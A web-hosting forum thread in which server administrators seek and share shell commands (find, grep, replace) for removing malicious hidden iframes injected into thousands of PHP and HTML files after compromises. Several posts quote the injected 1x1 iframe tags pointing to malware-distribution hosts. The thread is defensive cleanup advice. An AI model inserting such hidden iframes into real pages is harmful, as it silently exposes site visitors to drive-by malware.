Need help removing tag from thousands of files

ccccanada

Well-Known Member
Jan 17, 2003
279
0
166
Hello!

Somehow on Aug 21 some hacker was able to compromise one of our servers and placed the following tag at the end of the page on tens of thousands of php and html documents both inside and outside of the /home directory.

<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>

Since all the files that where affected where changed on the same day I was able with the following commands to get lists of affected documents on the server.

find / -perm 766 -exec ls -al {} \; | grep "Aug 21" > files766.txt

find / -perm 666 -exec ls -al {} \; | grep "Aug 21" > files666.txt

find / -perm 777 -exec ls -al {} \; | grep "Aug 21" > files777.txt

The above comand makes a text file with a list of all documents changed on that day and with certain permissions set and places in in the directory from where you ran the comand.

However now I am looking for help to find out if someone knows a command that will delete the line from all affected documents without me having to spend a month doing it manually.

If anyone can help it would be greatly appreciated.

Thanks
Harold
 

Murtaza_t

Well-Known Member
Jan 24, 2005
476
0
166
Earth
cPanel Access Level
Website Owner
This will help you:

Code:
#!/bin/bash

find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from PHP file"

find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'  '' -- {} > /dev/null \;

echo "Removed Tag from HTML file"

find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from ALL files"

echo "Murtaza was here"

exit
It will remove tags from all .php .html .htm

NOTE: Please use it on your own risk.
 

ccccanada

Well-Known Member
Jan 17, 2003
279
0
166
Thank you very much i will give it a try now.
 

wkdwich

Well-Known Member
Apr 11, 2005
105
0
166
Have you found an effective means of keeping these ataccks from reoccuring??


This will help you:

Code:
#!/bin/bash

find / -type f -name *.php -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from PHP file"

find / -type f -name *.html -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>'  '' -- {} > /dev/null \;

echo "Removed Tag from HTML file"

find / -type f -name *.htm -exec replace '<iframe width="1" height="1" src="http://step57.info/traff/index2.php" style="border: 0;"></iframe>' '' -- {} > /dev/null \;

echo "Removed Tag from ALL files"

echo "Murtaza was here"

exit
It will remove tags from all .php .html .htm

NOTE: Please use it on your own risk.
 

nick1

Member
May 21, 2006
24
0
151
I've same issue and I see iframe codes as following in my lot of php and html files.

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'

Can anyone please help me to tell how to remove them?

Thank you
 

nick1

Member
May 21, 2006
24
0
151
Thank you but right now I need to know how could i remove these codes,

they are encypted format like

#&449;#456&;

when I post those codes here I saw it become as following

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


:s
 

wkdwich

Well-Known Member
Apr 11, 2005
105
0
166
Thank you but right now I need to know how could i remove these codes,

they are encypted format like

#&449;#456&;

when I post those codes here I saw it become as following

'<iframe src='http://ccfelomvhk.com/dl/adv542.php' width=1 height=1></iframe>'


:s

depending on where the codes are:
regular html files
regular php files
inside a database

you can just upload your local versions to the site again and that should make things ok.. unless they are embedded in the database, then you may have to to to phpmyadmin and manully sreach and hand edit.. but as soon as you do that, stop your life and clean house.. local and remote
 

nick1

Member
May 21, 2006
24
0
151
iframe codes are in php and html files not in database so I think if I know the script I could remove them.

The issue is I don't have the backup for those files currently :(
 

wkdwich

Well-Known Member
Apr 11, 2005
105
0
166
iframe codes are in php and html files not in database so I think if I know the script I could remove them.

The issue is I don't have the backup for those files currently :(


Then you will have to save them locally, clean and reupload, it might be faster than using the file manager tool in the cpanel admin

how many files are you talking about?? do you have root SSH access?
 

wkdwich

Well-Known Member
Apr 11, 2005
105
0
166
thanks, I'm afraid to modify search iframe string :( what should I mention there :s
What I suggest is you use that tool (or the method I show below) to search the public_html directores of all the domains.. so if your server is set up like mine anything in
/home/

make a list of the files, then one by one.. sorry but if you have no local copies it has to be this way..

pico -w [filename]

you may or may not have pico.. you can use whatever editor you are familiar with.. but just delete anything from the < iframe > to and including the < /ifrmae > tag, save and close

You can try the method Murtaza_t suggested, but I have not tested that and I would not trust it personally..


the method I used:
I created a file on the server ftphack.txt that contained:
grep -l 'iframe' /home/*/public_html/*.htm
grep -l 'iframe' /home/*/public_html/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.htm
grep -l 'iframe' /home/*/public_html/*.php
grep -l 'iframe' /home/*/public_html/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.php
grep -l 'iframe' /home/*/public_html/*.html
grep -l 'iframe' /home/*/public_html/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*.html
grep -l 'iframe' /home/*/public_html/*/*/*/*/*/*/*.html


and I ran it from the command line with output.. now I could see every file that contained iframe in it and knew what I had to repair

your milage may vary and you may have to change the paths depending on your OS, but this worked very well for me.. and you need to hurry here.. the longer these files stay infeted the more ste visitors are getting infected the more this circle will continue to grow.. we have to stop this maddness!!

Last I suggest highly you get your PC looked at by a very qualified professional to make sure it is clean from any keyloggers or other critters.. install KeyScrambler on your local PC, change ALL the passwords on the server AFTER you have done all that locally.. if you have a keylogger on your PC you can change the passwords till you are purple.. they will keep tabs and stay updated.. If the keylogger on your system was the issue you shoud be good now.. if not you MUST contact your host people and ask them to thoroughly investigate if there are other domains on the server that were hit also to determine if it was a single issue or a server compromise.


oh and after all that is done, get everything copied locally.., you could have been done with this by now :)

Oh and if you do run any databases use phpmyadmin and search there for iframes to make sure its not in there too..
 
Last edited:

brianoz

Well-Known Member
Mar 13, 2004
1,146
7
168
Melbourne, Australia
cPanel Access Level
Root Administrator
A little more sophistication ...
Code:
find /home -name '*.php' -o -name '*.htm*' | xargs grep -l  iframe /dev/null
Works on infinite depth, and when /home is too big to expand '*'.

You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySql):

replace old new -- filelist

You'd have to get the iframe code exact and this would only work if it is all on one line.
 

nick1

Member
May 21, 2006
24
0
151
A little more sophistication ...
Code:
find /home -name '*.php' -o -name '*.htm*' | xargs grep -l  iframe /dev/null
Works on infinite depth, and when /home is too big to expand '*'.

You can do a global replace if you use the exact string, with the replace command (think it's actually part of MySql):

replace old new -- filelist

You'd have to get the iframe code exact and this would only work if it is all on one line.
very nice, thank you
 

mesranet

Well-Known Member
May 6, 2002
133
0
316
Hi,

Today one of my client effected with iframe to all .html file, the code as below:

<iframe src="http://peskostruikaz.com/?click=5364991" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<iframe src="http://peskostruikaz.com/?click=537207C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

Is it any solution by using 'find' to remove all those thing and the problem is on 'click=537207C' is a running number

Please help